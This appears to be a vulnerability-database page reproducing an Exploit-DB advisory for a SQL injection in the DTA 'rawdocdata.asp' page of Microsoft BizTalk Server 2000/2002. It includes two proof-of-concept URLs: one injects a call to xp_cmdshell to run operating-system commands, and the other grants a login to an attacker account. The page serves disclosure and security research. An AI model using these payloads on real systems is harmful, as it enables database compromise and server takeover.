Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbCesar CerrudoEDB-ID:22554
HistoryApr 30, 2003 - 12:00 a.m.

Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection

2003-04-3000:00:00
Cesar Cerrudo
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/7470/info

A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.

This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database. 


http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domain\attacker'--

Related

exploitdb 1
nvd 1
cvelist 1
cve 1
nessus 1
exploitdb
exploitdb
Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection
2003-04-30 00:00:00
nvd
nvd
CVE-2003-0118
2003-05-12 04:00:00
cvelist
cvelist
CVE-2003-0118
2003-05-02 04:00:00
cve
cve
CVE-2003-0118
2003-05-12 04:00:00
nessus
nessus
Microsoft BizTalk Server Multiple Remote Vulnerabilities
2003-05-20 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:22554
exploitdb1nvd1cvelist1cve1nessus1